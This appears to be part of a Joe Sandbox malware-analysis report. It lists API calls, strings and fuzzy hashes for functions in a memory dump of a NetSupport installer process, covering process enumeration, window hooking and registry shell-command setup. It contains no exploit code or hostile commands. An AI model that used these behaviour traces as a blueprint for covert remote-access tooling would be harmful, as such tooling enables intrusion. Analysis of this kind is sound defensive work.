                                                                                                                        • Instruction Fuzzy Hash: 98D1F471A102199BCB34EB64CD51BEA77F9EF94300F0481E5EA0A972D1FBB55E84CB90
                                                                                                                        Function 00B2D0F0 Relevance: 47.6, APIs: 18, Strings: 9, Instructions: 331libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(psapi.dll,5E06C67B,?,?,?,?,00B6747B,000000FF), ref: 00B2D130
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00B2D1CB
                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00B2D249
                                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00B2D274
                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00B2D2F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$LibraryLoadOpenProcess
                                                                                                                        • String ID: %s has %s$.dll$.exe$C:\Windows\Installer\$EnumProcessModules$EnumProcesses$GetModuleFileNameExW$psapi.dll$shfolder.dll
                                                                                                                        • API String ID: 2120802357-3786208033
                                                                                                                        • Opcode ID: 3ddf6cdad18c298e53cfe223b0c2dc2f602826701781d669e8ff4fd6e018292c
                                                                                                                        • Instruction ID: 447d037d35fdd8f13c10632c2940be677a6fb1d202815a7b46d1880f37090c5b
                                                                                                                        • Opcode Fuzzy Hash: 3ddf6cdad18c298e53cfe223b0c2dc2f602826701781d669e8ff4fd6e018292c
                                                                                                                        • Instruction Fuzzy Hash: 1AC181719002249BDB20EF68DC85BEA77F8FF58300F5485E9E58DA7250DB74AE81CB54
                                                                                                                        Function 00AFCB20 Relevance: 47.6, APIs: 20, Strings: 7, Instructions: 309synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064), ref: 00AFCBAC
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,?), ref: 00AFCBCF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AFCBDA
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 00AFCBEF
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 00AFCBF5
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00AFCBFB
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 00AFCC31
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00AFCC5D
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 00AFCC67
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 00AFCCC8
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00AFCD04
                                                                                                                        • wsprintfW.USER32 ref: 00AFCD7A
                                                                                                                        • _memmove.LIBCMT ref: 00AFCDA8
                                                                                                                        • SetEvent.KERNEL32(FFFFCFC7), ref: 00AFCDBA
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064), ref: 00AFCE02
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Event$Wait$Reset$MultipleObjectObjectsProcessSingle$CloseCurrentHandleOpen_memmovewsprintf
                                                                                                                        • String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
                                                                                                                        • API String ID: 2524104981-3727536503
                                                                                                                        • Opcode ID: e0e840d29091ea50f3efb504c472381e758cde23ef32e90c11ff84bf3e6efd4b
                                                                                                                        • Instruction ID: 8cc4b53a5c2f7e389da0a8b31c13fac1f66d745a958d914d766ee83b41e6b749
                                                                                                                        • Opcode Fuzzy Hash: e0e840d29091ea50f3efb504c472381e758cde23ef32e90c11ff84bf3e6efd4b
                                                                                                                        • Instruction Fuzzy Hash: 06C16B756007089FD724DF65D984B6AB7E5FF88320F10865EEA4A87791CB74E881CF90
                                                                                                                        Function 00B060C0 Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 224windowmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B060DE
                                                                                                                        • GetStockObject.GDI32(0000000F), ref: 00B060F2
                                                                                                                        • GetDC.USER32(00000000), ref: 00B06174
                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 00B06185
                                                                                                                        • RealizePalette.GDI32(00000000), ref: 00B0618B
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00B061A6
                                                                                                                        • SelectPalette.GDI32(00000000,?,00000001), ref: 00B061BA
                                                                                                                        • RealizePalette.GDI32(00000000), ref: 00B061BD
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B061C5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                                                        • String ID: (
                                                                                                                        • API String ID: 1969595663-3887548279
                                                                                                                        • Opcode ID: ec1376b8a6e928d500c093404c2097350367f60cbde0cd6a2f17a5875948ef12
                                                                                                                        • Instruction ID: 96d3fcc6bc7789e7d8875007000b821907598ae79c922bd4895861bbff678aee
                                                                                                                        • Opcode Fuzzy Hash: ec1376b8a6e928d500c093404c2097350367f60cbde0cd6a2f17a5875948ef12
                                                                                                                        • Instruction Fuzzy Hash: 2D716FB1A00218ABDB10DFA4DC89BEEBBFDFF49711F144159F501E7290DBB899418BA0
                                                                                                                        Function 00B28F20 Relevance: 42.3, APIs: 28, Instructions: 260COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowTextW.USER32(?,?,000000F0), ref: 00B28F4C
                                                                                                                        • wsprintfW.USER32 ref: 00B28F6D
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00B28FB7
                                                                                                                        • GetDlgItemTextW.USER32(?,0000041C,?,000000F0), ref: 00B28FD5
                                                                                                                        • wsprintfW.USER32 ref: 00B28FEF
                                                                                                                        • SetDlgItemTextW.USER32(?,0000041C,?), ref: 00B2903C
                                                                                                                        • GetDlgItemTextW.USER32(?,0000041D,?,000000F0), ref: 00B29054
                                                                                                                        • wsprintfW.USER32 ref: 00B29091
                                                                                                                        • SetDlgItemTextW.USER32(?,0000041D,?), ref: 00B290DE
                                                                                                                        • GetDlgItemTextW.USER32(?,0000041E,?,000000F0), ref: 00B29100
                                                                                                                        • wsprintfW.USER32 ref: 00B2911B
                                                                                                                        • SetDlgItemTextW.USER32(?,0000041E,?), ref: 00B2916C
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00B2917D
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B29180
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00B2918B
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2918E
                                                                                                                        • GetDlgItem.USER32(?,00000006), ref: 00B291B0
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B291B9
                                                                                                                        • GetDlgItem.USER32(?,00000006), ref: 00B291C0
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B291C9
                                                                                                                        • GetDlgItem.USER32(?,00000007), ref: 00B291D6
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B291D9
                                                                                                                        • GetDlgItem.USER32(?,00000007), ref: 00B291E6
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B291E9
                                                                                                                        • GetDlgItem.USER32(?,0000041E), ref: 00B291F9
                                                                                                                        • EnableWindow.USER32(00000000), ref: 00B291FC
                                                                                                                        • GetDlgItem.USER32(?,0000041E), ref: 00B2920C
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B2920F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Item$Window$Text$EnableShowwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1904402394-0
                                                                                                                        • Opcode ID: 73d0ace09851024920a94e336319f63201ff2c2faa6428922fe710b0d4aaa878
                                                                                                                        • Instruction ID: ae1fb95c21352df4015b69a50c350448ad71842d24513a7e1d2b20bef7e71b82
                                                                                                                        • Opcode Fuzzy Hash: 73d0ace09851024920a94e336319f63201ff2c2faa6428922fe710b0d4aaa878
                                                                                                                        • Instruction Fuzzy Hash: 5081B2B1E4022BAADB24AB60DD45FFB77BDEB24710F0005A5E60DA71C1EB75DA41CB60
                                                                                                                        Function 00B308E8 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 138synchronizationsleeplibraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(?), ref: 00B308FE
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000F), ref: 00B3091A
                                                                                                                        • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 00B30934
                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00B30941
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00B30954
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00B30959
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000032), ref: 00B3096A
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 00B30978
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00B30993
                                                                                                                        • GetProcAddress.KERNEL32(?,MyUnhook), ref: 00B309C5
                                                                                                                        • GetDesktopWindow.USER32 ref: 00B309EC
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00B30A00
                                                                                                                        • OpenProcess.KERNEL32(00000600,00000000,?), ref: 00B30A19
                                                                                                                        • OpenProcess.KERNEL32(00000200,00000000,?), ref: 00B30A2E
                                                                                                                        • GetPriorityClass.KERNEL32(00000000), ref: 00B30A37
                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00B30A4C
                                                                                                                        • GetDesktopWindow.USER32 ref: 00B30A58
                                                                                                                        • SendMessageW.USER32(00000000), ref: 00B30A5F
                                                                                                                        • Sleep.KERNEL32(000000FA,80000002,Software\NetSupport Ltd\winsthooks,00020219), ref: 00B30AAC
                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000000), ref: 00B30AB8
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B30ABF
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B30ADD
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B30AEA
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B30AF3
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B30B10
                                                                                                                          • Part of subcall function 00AE9770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00AE9791
                                                                                                                          • Part of subcall function 00AE9770: GetWindowLongW.USER32(00000000,000000F0), ref: 00AE97A4
                                                                                                                          • Part of subcall function 00AE9770: DwmGetWindowAttribute.DWMAPI(00000000,0000000E,?,00000004), ref: 00AE97C2
                                                                                                                          • Part of subcall function 00AE9770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00AE9839
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CloseHandle$ClassFindObjectPriorityProcessSingleWait$DesktopLongOpenShow$AddressAttributeEventFreeLibraryMessageProcResetSendSleepThread
                                                                                                                        • String ID: MyUnhook$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s
                                                                                                                        • API String ID: 3586307839-2527058001
                                                                                                                        • Opcode ID: 062ad435d50dc9b0224d7b62308e6ec18e4ec70e822c70edefd58e8146510abe
                                                                                                                        • Instruction ID: 1ed2f6b22881ee5510eb1b96d29a6445bbbdc4fdbf43dca151cf269ca9d63426
                                                                                                                        • Opcode Fuzzy Hash: 062ad435d50dc9b0224d7b62308e6ec18e4ec70e822c70edefd58e8146510abe
                                                                                                                        • Instruction Fuzzy Hash: 0341D371A10715AFDB30AB60DC98BAE73ACEF44701F1000D8E609A32D2DEB49D84CF55
                                                                                                                        Function 00B42D4E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00B3D3F0), ref: 00B42D56
                                                                                                                        • __mtterm.LIBCMT ref: 00B42D62
                                                                                                                          • Part of subcall function 00B42A21: DecodePointer.KERNEL32(00000006,00B42EC4,?,00B3D3F0), ref: 00B42A32
                                                                                                                          • Part of subcall function 00B42A21: TlsFree.KERNEL32(00000016,00B42EC4,?,00B3D3F0), ref: 00B42A4C
                                                                                                                          • Part of subcall function 00B42A21: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,00B42EC4,?,00B3D3F0), ref: 00B491BF
                                                                                                                          • Part of subcall function 00B42A21: _free.LIBCMT ref: 00B491C2
                                                                                                                          • Part of subcall function 00B42A21: DeleteCriticalSection.KERNEL32(00000016,76EF5810,?,00B42EC4,?,00B3D3F0), ref: 00B491E9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B42D78
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B42D85
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B42D92
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B42D9F
                                                                                                                        • TlsAlloc.KERNEL32(?,00B3D3F0), ref: 00B42DEF
                                                                                                                        • TlsSetValue.KERNEL32(00000000,?,00B3D3F0), ref: 00B42E0A
                                                                                                                        • __init_pointers.LIBCMT ref: 00B42E14
                                                                                                                        • EncodePointer.KERNEL32(?,00B3D3F0), ref: 00B42E25
                                                                                                                        • EncodePointer.KERNEL32(?,00B3D3F0), ref: 00B42E32
                                                                                                                        • EncodePointer.KERNEL32(?,00B3D3F0), ref: 00B42E3F
                                                                                                                        • EncodePointer.KERNEL32(?,00B3D3F0), ref: 00B42E4C
                                                                                                                        • DecodePointer.KERNEL32(Function_00062BA5,?,00B3D3F0), ref: 00B42E6D
                                                                                                                        • __calloc_crt.LIBCMT ref: 00B42E82
                                                                                                                        • DecodePointer.KERNEL32(00000000,?,00B3D3F0), ref: 00B42E9C
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B42EAE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                        • API String ID: 3698121176-3819984048
                                                                                                                        • Opcode ID: 42e153a27ec1799895539232ee436e00d03c1d6822c1dc1f58f824f595a0fb39
                                                                                                                        • Instruction ID: 10b0ca9473f4fb7efc40b1afb27f97a2a6313c49b7d66e0aad904f060fb6081c
                                                                                                                        • Opcode Fuzzy Hash: 42e153a27ec1799895539232ee436e00d03c1d6822c1dc1f58f824f595a0fb39
                                                                                                                        • Instruction Fuzzy Hash: FF317A35E40311AECB21AF75AE49A163FE4EB44B60F54016BF824932F4DFB48A45EF60
                                                                                                                        Function 00AE6280 Relevance: 38.8, APIs: 9, Strings: 13, Instructions: 342COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$EnvironmentExpandStrings__wcsicoll__wcsnicmp_wcschr
                                                                                                                        • String ID: %sUseHKLM$%s\%s$ConfigList$General\ProductId$HKCU$HKLM$NSM$NSS$NetSupport School$NetSupport School Pro$Software\NetSupport Ltd$Software\Productive Computer Insight$\
                                                                                                                        • API String ID: 2277666257-3241390832
                                                                                                                        • Opcode ID: 0be1cccf67d6eb62734b14b1d72052699fa32981bf40d249b04208cd4e884d5e
                                                                                                                        • Instruction ID: 5718528a4deb94cb4b9ac8a755bde6d33d2a082939a4928e53fa4eb1cd1df0c5
                                                                                                                        • Opcode Fuzzy Hash: 0be1cccf67d6eb62734b14b1d72052699fa32981bf40d249b04208cd4e884d5e
                                                                                                                        • Instruction Fuzzy Hash: 5CD1A371A003589ADB20EB64DC95BDDB7F8AF65304F5044D8F909A3291EB745F88CFA2
                                                                                                                        Function 00B251E0 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 187registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • LoadStringW.USER32(00AE0000,00000421,?,00000080), ref: 00B25258
                                                                                                                        • wsprintfW.USER32 ref: 00B2528C
                                                                                                                        • wsprintfW.USER32 ref: 00B252A9
                                                                                                                        • wsprintfW.USER32 ref: 00B252DC
                                                                                                                        • RegCreateKeyW.ADVAPI32(80000000,?,?), ref: 00B25308
                                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,?), ref: 00B25348
                                                                                                                        • RegCreateKeyW.ADVAPI32(?,command,?), ref: 00B2537F
                                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,?), ref: 00B253BA
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B253D8
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B253E5
                                                                                                                        • wsprintfW.USER32 ref: 00B25400
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 00B25417
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000000,?), ref: 00B2543A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$CloseCreateDeleteValue$LoadLocalStringTime_mallocwvsprintf
                                                                                                                        • String ID: "%spcinssui.exe" /ShowVideo "%%L"$%s=%s, err=%d$%s\command$%s\shell\show$Del %s, err=%d$Done InstallShowVideo.$InstallShowVideo %d$command$command=%s, err=%d
                                                                                                                        • API String ID: 217169776-1530699150
                                                                                                                        • Opcode ID: 3c930f96a250042f77b2348a6bb2348a87c798b17c2ebd01516fb502605c303f
                                                                                                                        • Instruction ID: a5cfa540ff7544f036e24192bd88990dafb3bd47803d0203a046affa1d6077f4
                                                                                                                        • Opcode Fuzzy Hash: 3c930f96a250042f77b2348a6bb2348a87c798b17c2ebd01516fb502605c303f
                                                                                                                        • Instruction Fuzzy Hash: 3B61B1B1900228ABDB24DF54DC85FEB73F9EF84700F0481D9E50DA7190EAB1AA94CF95
                                                                                                                        Function 00B0E090 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 289windowlibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000080), ref: 00B0E0D7
                                                                                                                        • _memset.LIBCMT ref: 00B0E16E
                                                                                                                        • _memset.LIBCMT ref: 00B0E1C3
                                                                                                                        • _memset.LIBCMT ref: 00B0E214
                                                                                                                        • EnumChildWindows.USER32(?,Function_0002DF40,?), ref: 00B0E229
                                                                                                                        • GetClassNameW.USER32(?,?,00000040), ref: 00B0E33B
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B0E3D6
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00B0E44A
                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00B0E45D
                                                                                                                        • LoadLibraryW.KERNEL32(psapi.dll), ref: 00B0E472
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00B0E4B1
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B0E4D5
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B0E4DC
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B0E4ED
                                                                                                                        • PostMessageW.USER32(?,00000200,00000000,00050005), ref: 00B0E505
                                                                                                                        • PostMessageW.USER32(?,00000201,00000000,00050005), ref: 00B0E513
                                                                                                                        • PostMessageW.USER32(?,00000202,00000000,00050005), ref: 00B0E521
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost_memset$ClassLibraryNameProcessWindow$AddressChildCloseEnumErrorFreeHandleLastLoadOpenProcRectThreadWindows
                                                                                                                        • String ID: #32770$Button$GetModuleFileNameExW$psapi.dll
                                                                                                                        • API String ID: 3432119596-2766096174
                                                                                                                        • Opcode ID: 165dbe231f117ebd44f1d6efac5f36e132283eab700a07012f2c61a5b2eff8d7
                                                                                                                        • Instruction ID: 721eaad8641a793bf4eed1e712650408bbbef7a14f3524d67bffc423c0e47a88
